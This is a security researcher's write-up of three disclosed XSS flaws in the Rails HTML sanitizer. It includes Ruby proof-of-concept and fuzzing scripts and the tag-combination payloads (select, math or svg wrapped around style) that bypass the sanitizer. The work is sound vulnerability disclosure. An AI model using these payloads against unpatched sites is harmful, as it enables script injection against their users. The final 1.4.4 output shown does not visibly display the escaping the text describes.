A while ago I was writing an application based on the Rails framework which returned sanitized user input. Its purpose was to build a PoC for an XSS vulnerability in the Rails HTML sanitizer (CVE-2022-32209, which appeared in June 2022). The following is a short write-up of that endeavour and how it turned into the discovery of two additional CVEs.
I start with a discussion of the original CVE-2022-32209, proceed with an investigation of the fix and how it turned out to be incomplete (CVE-2022-23520), explain how that motivated additional fuzzing which uncovered additional working attack payloads (CVE-2022-23519) and conclude with a brief outline of the fix (entirely designed and implemented by flavorjones).
CVE-2022-32209: XSS when select and style tags are allowed
The Rails HTML sanitizer gives Rails developers the ability to accept user input that contains HTML and return that
HTML to (other) users, but without introducing XSS.
It does that by allowing only selected sets of HTML tags and attributes and scrubbing the rest.
As a developer, you can modify these allow lists.
Of course, you should not do anything stupid like adding script
to the allow list of HTML tags.
Beyond that though, the job of the sanitizer is to work with any reasonable allow list developers come up with.
The starting point for CVE-2022-32209 is this HackerOne report.
It describes how the Rails HTML sanitizer does not work properly when both the style
and select
tags are allowed.
Lets write a small script to see what happens.
I’ve stored it in a file sanitize-1-4-2.rb
to emphasize that the version of the Rails sanitizer is pinned to 1.4.2
.
This is the code (heavily inspired by flavorjones, the author of the sanitizer,
see here):
#! /usr/bin/env ruby
require "bundler/inline"
require 'bundler'
Bundler.configure_gem_home_and_path ".cache/bundler"
gemfile do
source "https://rubygems.org"
gem "rails-html-sanitizer", "=1.4.2"
end
require "rails-html-sanitizer"
if ARGV.length != 2
puts "Pass 2 arguments:"
puts " 1st the string to sanitize"
puts " 2nd the tags you want to whitelist"
exit
end
input = ARGV[0]
tags = ARGV[1].split(' ')
puts "Current Version : " + Rails::Html::Sanitizer::VERSION
puts "Input string : " + input
puts "Allowed tags : " + tags.join(' ')
def sanitize(input, tags)
Rails::Html::SafeListSanitizer.new.sanitize(input, tags: tags)
end
puts "Output : " + sanitize(input, tags)
The script accepts two arguments: first a string to sanitize and second a list of allowed HTML tags. Then it will print the sanitized string to your console. Run it and you see that the sanitizer does a good job of sanitizing HTML:
user@notebook:~$ ./sanitize-1-4-2.rb '<div><script>alert()</script></div> <img src=x onerror=alert()>' 'div img'
Current Version : 1.4.2
Input string : <div><script>alert()</script></div> <img src=x onerror=alert()>
Allowed tags : div img
Output : <div>alert()</div> <img src="x">
We allowed both div
and img
as tags and the sanitizer removed all other dangerous tags and attributes from the HTML string.
The script
tag is gone and the onerror
attribute of the img
tag is removed too.
However, run it with the following input string while allowing tags select
and style
and surprisingly, the script
tag
in the input string remains exactly where it is:
user@notebook:~$ ./sanitize-1-4-2.rb '<select><style><script>alert()</script></style></select>' 'select style'
Current Version : 1.4.2
Input string : <select><style><script>alert()</script></style></select>
Allowed tags : select style
Output : <select><style><script>alert()</script></style></select>
The original HackerOne report used a slightly different, malformed string as input
but it basically worked with the simple string above, as we’ve just seen.
Version 1.4.3
rolled out a fix for the vulnerability, so everything should be fine when using that version.
CVE-2022-23520: Incomplete fix for CVE-2022-32209
Now one day I was building a small application in Rails and wanted to update my sanitizer to fix CVE-2022-32209. A small change in the Gemfile was all it took. Then I’ve testet the payload shown above to make sure the Gem was actually updated. To my surprise though, the application was still vulnerable. First I convinced myself that the problem was not me being too stupid to update a Gem, then I went off investigating what was going on here.
Code for the sanitizer lives in its own repository at github.com/rails/rails-html-sanitizer.
Looking at the recent commits, I found this one,
which seemed to be the fix for CVE-2022-32209.
Basically, all it does is define a new private method remove_safelist_tag_combinations
on the sanitizer,
which removes style
from the list of allowed tags if select
is in there too.
This new method is used within another method allowed_tags
, whose responsibility is to return
the list of allowed tags and which is used within the sanitize
method.
See the relevant code below:
module Rails
module Html
class SafeListSanitizer < Sanitizer
...
def sanitize(html, options = {})
...
elsif allowed_tags(options) || allowed_attributes(options)
@permit_scrubber.tags = allowed_tags(options)
...
end
...
private
...
def remove_safelist_tag_combinations(tags)
if !loofah_using_html5? && tags.include?("select") && tags.include?("style")
warn("WARNING: #{self.class}: removing 'style' from safelist, should not be combined with 'select'")
tags.delete("style")
end
tags
end
def allowed_tags(options)
if options[:tags]
remove_safelist_tag_combinations(options[:tags])
else
self.class.allowed_tags
end
end
...
end
end
end
You may have noticed that the method remove_safelist_tag_combinations
is applied to the allowed tags only
if they are passed within the options
. If no tags are in the options, allowed_tags
falls back to the
class variable Rails::Html::SafeListSanitizer.allowed_tags
, which contains a default value with a few
harmless tags (source code).
So far so good. All of this looks solid at first sight.
When building an application in Rails, you don’t use the Gem explicitly.
Rather, it is part of the framework and “just there”.
The documentation of Rails tells you how to use it here.
In the docs you find different ways in which you can pass custom allowed tag lists.
One is to use the Rails config/application.rb
and set something like config.action_view.sanitized_allowed_tags = ["select", "style"]
.
The allow list will then be applied globally in your application.
Another is to pass it explicitly as an option when calling the sanitizer, e.g., in your ERB templates.
It could look like this: <p>Hello <%= sanitize @name, tags: ["select", "style"] %></p>
.
In this case, the allow list will be specific to this call.
When I updated my application and the fix did not work, I used the first of the ways shown above,
i.e., setting an allow list in config/application.rb
.
It turned out that the way this setting works is that it overwrites the class variable
Rails::Html::SafeListSanitizer.allowed_tags
, which I think is exposed
here
in the ActionView helpers.
As we saw above, the new method remove_safelist_tag_combinations
does not apply to that list (since it was mistakenly assumed to be constant?).
This means the fix does not work when setting allowed tags via config.
You can convince yourself of the behaviour with this simple script
which I’ve named sanitize-1-4-3.rb
:
#! /usr/bin/env ruby
require "bundler/inline"
require 'bundler'
Bundler.configure_gem_home_and_path ".cache/bundler"
gemfile do
source "https://rubygems.org"
gem "rails-html-sanitizer", "=1.4.3"
end
require "rails-html-sanitizer"
if ARGV.length != 2
puts "Pass 2 arguments:"
puts " 1st the string to sanitize"
puts " 2nd the tags you want to whitelist"
exit
end
input = ARGV[0]
tags = ARGV[1].split(' ')
puts "Current Version : " + Rails::Html::Sanitizer::VERSION
puts "Input string : " + input
puts "Allowed tags : " + tags.join(' ')
def sanitize_argument(input, tags)
Rails::Html::SafeListSanitizer.new.sanitize(input, tags: tags)
end
def sanitize_class_varible(input, tags)
Rails::Html::SafeListSanitizer.allowed_tags = tags
output = Rails::Html::SafeListSanitizer.new.sanitize(input)
Rails::Html::SafeListSanitizer.allowed_tags = nil
output
end
puts "Output (class variable) : " + sanitize_class_varible(input, tags)
puts "Output (argument) : " + sanitize_argument(input, tags)
Run it and you get an output as shown below. As you can see, the string is properly sanitized when passing the allow list in the options but not sanitized when the class variable is overwritten:
user@notebook:~$ ./sanitize-1-4-3.rb '<select><style><script>alert()</script></style></select>' 'select style'
Current Version : 1.4.3
Input string : <select><style><script>alert()</script></style></select>
Allowed tags : select style
Output (class variable) : <select><style><script>alert()</script></style></select>
WARNING: Rails::Html::SafeListSanitizer: removing 'style' from safelist, should not be combined with 'select'
Output (argument) : <select><script>alert()</script></select>
This was reported at HackerOne here and disclosed as CVE-2022-23520 and GHSA-rrfc-7g8p-99q8.
CVE-2022-23519: More XSS for math+style and svg+style
A reader with an eye for details may have noticed something strange about the fix.
The method remove_safelist_tag_combinations
removes style
from the allow list
only if three conditions are met:
style
is in the list: makes perfect sense, removestyle
only if it is thereselect
is in the list: also makes sense, the combination was the problem!loofah_using_html5?
: this reads like “only if we are not using an HTML5 parser”
The third condition raises some suspicion.
Could it be that the Rails sanitizer does not use an HTML5-compliant parser?
If the parser of the sanitizer is different from the parser of your browser,
then there could be a lot more problems than just the select
and style
tag combination.
To test, I wrote a small fuzzing script named fuzz-1-4-3.rb
that would test a few hand-picked XSS payloads
wrapped into all possible combinations of two HTML tags against the sanitizer.
It looked like this:
#! /usr/bin/env ruby
require "bundler/inline"
require 'bundler'
Bundler.configure_gem_home_and_path ".cache/bundler"
gemfile do
source "https://rubygems.org"
gem "rails-html-sanitizer", "=1.4.3"
end
require "rails-html-sanitizer"
puts "[+] Current Version : " + Rails::Html::Sanitizer::VERSION
def render(i, sanitized, wrapped_payload)
html = <<-EOF
<html>
<head>
<script>
function next() {
window.location = "file:///tmp/www/file#{i+1}.html";
}
</script>
</head>
<body onload=next()>
#{CGI::escapeHTML(wrapped_payload)}
#{sanitized}
</body>
</html>
EOF
File.write("/tmp/www/file#{i}.html", html)
sanitized
end
def wrap(tag1, tag2, payload)
"<#{tag1}><#{tag2}>#{payload}</#{tag1}></#{tag2}>"
end
def sanitize(tag1, tag2, s)
Rails::Html::SafeListSanitizer.new.sanitize s, tags: [tag1, tag2]
end
html_tags = File.readlines("html-tags.txt", chomp: true)
payloads = {
"<script>alert()</script>" => ["<script>"],
"<img src=x onerror=alert()>" => ["onerror", "alert"],
}
i = 0
puts "[+] Generating test files..."
html_tags.each do |tag1|
html_tags.each do |tag2|
payloads.each do |payload, indicators|
wrapped_payload = wrap(tag1, tag2, payload)
sanitized = sanitize(tag1, tag2, wrapped_payload)
if indicators.all? { |indicator| sanitized.include? indicator }
render(i, sanitized, wrapped_payload)
puts "- Rendered #{i} (allowed tags [#{tag1} #{tag2}]): #{sanitized}"
i += 1
end
end
end
end
A few explanations.
The function render
writes numbered HTML test files into /tmp/www/
(numbering should be consecutive, starting at 0).
You pass sanitized
, which is the previously sanitized string that is embedded in the HTML body.
You also pass wrapped_payload
, which is rendered to the HTML body in HTML-escaped form (just so you can later see what the payload was).
The HTML header contains a script which changes the location to the next test file once the body finished loading
(e.g., it navigates to /tmp/www/file1.html
if the current file is /tmp/www.file0.html
).
The idea is that the browser will later navigate from file to file, either until it reaches the end
or until one of the sanitized XSS payloads will alert()
, which stops the process.
The next functions are wrap
, which wraps a payload
into two tags tag1
and tag2
and sanitize
, which applies sanitization on a string while allowing tag1
and tag2
.
The script also relies on a file html-tags.txt
from which it reads the wordlist of HTML tags.
Mine was compiled from various places and had 136 entries.
Find it here.
Finally, I’ve defined a Ruby hash called payloads
with two simple XSS payloads,
each accompanied with a list of strings I call indicators.
The idea of that is to only render test files when the indicator strings are present
to avoid rendering files that are unlikely to execute the payload.
Finally, at the bottom of the script, nested loops run through the list of tags and payloads,
sanitize the wrapped payload and render the test file if all indicators are present.
Note that I pass the allow list as an option to sanitize
to avoid getting hits for
the known combination of select
and style
.
Ensure html-tags.txt
exists in the current directory, /tmp/www/
exists and is empty, and then run the script with ./fuzz-1-4-3.rb
to generate 536 test files.
Then open a browser.
I’ve used chromium --disable-ipc-flooding-protection
.
Without the argument it may stop navigating to the next file after a while.
In the browser, navigate to file:///tmp/www/file0.html
now, then watch.
After a short while, you should see for “file163.html”, which contains
the wrapped payload <math><style><img src=x onerror=alert()></math></style></math>
:
Keep going and you will get two more hits for “file498.html” and “file499.html”.
In the end, all of them are due to the following two combinations of tags, which allow
for XSS just like the combination select
and style
did:
math
andstyle
: works for a payload like<math><style><img src=x onerror=alert()></math></style></math>
, which the sanitizer will not changesvg
andstyle
: works for both payloads<svg><style><script>alert()</script></svg></style></svg>
and<svg><style><img src=x onerror=alert()></svg></style></svg>
This was reported at HackerOne here and disclosed as CVE-2022-23519 and GHSA-9h9g-93gc-623h.
The underlying problem and its current fix
If you really want to know what is going on under the hood then stop reading this and go to these decision notes instead. You will find a very extensive and detailed analysis of these and other related CVEs there (note that the repository is github.com/flavorjones/loofah, which is the actual implementation of the Rails HTML sanitizer).
The short summary of this analysis: the problem is indeed the use of an HTML4 parser.
An HTML4 DOM seems to treat the contents of the style
tags as CDATA
which needs no escaping or sanitization.
In an HTML5 DOM however everything inside math
and svg
tags is “foreign content” and special parsing rules apply.
For example, for the case of <math><style><img src=x onerror=alert()></math></style></math>
,
an HTML5 parser seems to treat the img
tag within math
and style
as an error and repairs the DOM for you by moving it out
(as described here).
The fix this time appears to be this commit, which is an implementation of solution two presented in the decision notes. Effectively it now escapes everything the HTML4 parser parses as CDATA.
You can convince yourself by building a test script as those shown above, but for version 1.4.4
of the Gem.
Run it and you see that the characters <
, >
and &
are escaped now:
user@notebook:~$ ./sanitize-1-4-4.rb '<math><style><img src=x onerror=alert()></math></style></math>' 'math style'
Current Version : 1.4.4
Input string : <math><style><img src=x onerror=alert()></math></style></math>
Allowed tags : math style
Output : <math><style><img src=x onerror=alert()></math></style></math>
Moreover, if you re-run the fuzzing script with the Gem version bumped to 1.4.4
,
you still get a 269 test files but none of them hit anymore.
Thus, it looks to me as if this particular issue is finally gone.